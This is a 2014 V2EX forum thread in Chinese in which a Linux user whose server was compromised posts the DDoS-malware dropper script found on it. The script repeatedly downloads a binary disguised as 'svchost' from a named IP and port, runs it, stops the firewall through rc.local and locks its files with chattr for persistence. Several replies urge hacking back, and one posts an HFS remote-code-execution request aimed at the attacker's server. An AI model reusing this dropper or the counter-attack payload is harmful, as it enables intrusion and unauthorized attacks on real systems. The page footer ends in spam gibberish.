系统被入侵,被人家植入 DDOS 木马发现一个脚本. - V2EX
Home Sign Up Sign In
V2EX = way to explore
V2EX 是一个关于分享和探索的地方
Sign Up Now
For Existing Member  Sign In
Distributions
Ubuntu
Fedora
CentOS
中文资源站
网易开源镜像站
webjin
V2EX    Linux

系统被入侵,被人家植入 DDOS 木马发现一个脚本.

  •   
  •   webjin Sep 16, 2014 4917 views
    This topic created in 4241 days ago, the information mentioned may be changed or developed.
    #!/bin/bash

    DOWNURL="http://183.60.202.209:44335/"
    DOWNDIR="/bin/"

    run_proc()
    {
    chmod 777 $DOWNDIR$1
    nohup $DOWNDIR$1 > /dev/null 2>&1 &
    [ -z "`grep -w \"iptables stop\" /etc/rc.local`" ] && echo "/etc/init.d/iptables stop" >> /etc/rc.local
    [ -z "`grep -w $DOWNDIR$1 /etc/rc.local`" ] && echo "$DOWNDIR$1 &" >> /etc/rc.local
    [ -f "/etc/$1" ] && chattr -i /etc/$1 && \rm -rf /etc/$1
    \cp $DOWNDIR$1 /etc/$1
    chattr +i /etc/$1
    chattr +i $DOWNDIR$1
    }

    check_proc()
    {
    if [ -z "`ps -A|grep -w $1`" ];then
    if [ ! -f "$DOWNDIR$1" ];then
    wget "$DOWNURL$1" -O "$DOWNDIR$1" > /dev/null 2>&1
    fi
    if [ -f "$DOWNDIR$1" ];then
    run_proc $1
    fi
    fi
    }

    while [ 1 ]
    do
    check_proc "svchost"
    sleep 3
    done
    ========================================
    http://183.60.202.209:44335 里面有黑客的工具可惜都是编译之后的。
  • downdir
  • chattr
  • grep
    9 replies    2014-09-17 06:23:04 +08:00
    yoyicue
        1
    yoyicue  
       Sep 16, 2014
    黑客这么喜欢 HFS 啊
    http://61.147.103.185:8089/
    Akagi201
        2
    Akagi201  
       Sep 16, 214
    lz能说说怎么发现的吗?
    semicircle21
        3
    semicircle21  
       Sep 16, 2014
    同求楼主说说, 怎么发现的..
    Bakemono
        4
    Bakemono  
       Sep 16, 2014
    @yoyicue HFS 刚刚爆出 Remote Code Execution 的漏洞,快反击!
    http://www.exploit-db.com/exploits/34668/
    izoabr
        5
    izoabr  
       Sep 16, 2014
    脚本写得真烂
    csx163
        6
    csx163  
       Sep 16, 2014
    估计是用nmap发现的
    webjin
        7
    webjin  
    OP
       Sep 17, 2014 via Android
    @Akagi201 在/etc/rc.local文件里面发现有执行
    q397064399
        8
    q397064399  
       Sep 17, 2014
    @Bakemono 不知道怎么用 刚才用windows命令 然后urlcode编码 貌似没反应
    q397064399
        9
    q397064399  
       Sep 17, 2014
    @Bakemono http://183.60.202.209:44335/?search==%00{.exec|cmd%20/c%20shutdown%20-t.}
    无反应
    About     Help     Advertise     Blog     API     FAQ     Solana     4079 Online   Highest 6679       Select Language
    创意工作者们的社区
    World is powered by solitude
    VERSION: 3.9.8.5 153ms UTC 00:52 PVG 08:52 LAX 17:52 JFK 20:52
    Do have faith in what you're doing.
    ubao msn snddm index pchome yahoo rakuten mypaper meadowduck bidyahoo youbao zxmzxm asda bnvcg cvbfg dfscv mmhjk xxddc yybgb zznbn ccubao uaitu acv GXCV ET GDG YH FG BCVB FJFH CBRE CBC GDG ET54 WRWR RWER WREW WRWER RWER SDG EW SF DSFSF fbbs ubao fhd dfg ewr dg df ewwr ewwr et ruyut utut dfg fgd gdfgt etg dfgt dfgd ert4 gd fgg wr 235 wer3 we vsdf sdf gdf ert xcv sdf rwer hfd dfg cvb rwf afb dfh jgh bmn lgh rty gfds cxv xcv xcs vdas fdf fgd cv sdf tert sdf sdf sdf sdf sdf sdf sdf sdf sdf sdf sdf sdf sdf sdf sdf sdf sdf sdf sdf sdf sdf sdf sdf sdf sdf sdf sdf sdf sdf sdf sdf sdf sdf sdf sdf sdf sdf sdf sdf sdf shasha9178 shasha9178 shasha9178 shasha9178 shasha9178 liflif2 liflif2 liflif2 liflif2 liflif2 liblib3 liblib3 liblib3 liblib3 liblib3 zhazha444 zhazha444 zhazha444 zhazha444 zhazha444 dende5 dende denden denden2 denden21 fenfen9 fenf619 fen619 fenfe9 fe619 sdf sdf sdf sdf sdf zhazh90 zhazh0 zhaa50 zha90 zh590 zho zhoz zhozh zhozho zhozho2 lislis lls95 lili95 lils5 liss9 sdf0ty987 sdft876 sdft9876 sdf09876 sd0t9876 sdf0ty98 sdf0976 sdf0ty986 sdf0ty96 sdf0t76 sdf0876 df0ty98 sf0t876 sd0ty76 sdy76 sdf76 sdf0t76 sdf0ty9 sdf0ty98 sdf0ty987 sdf0ty98 sdf6676 sdf876 sd876 sd876 sdf6 sdf6 sdf9876 sdf0t sdf06 sdf0ty9776 sdf0ty9776 sdf0ty76 sdf8876 sdf0t sd6 sdf06 s688876 sd688 sdf86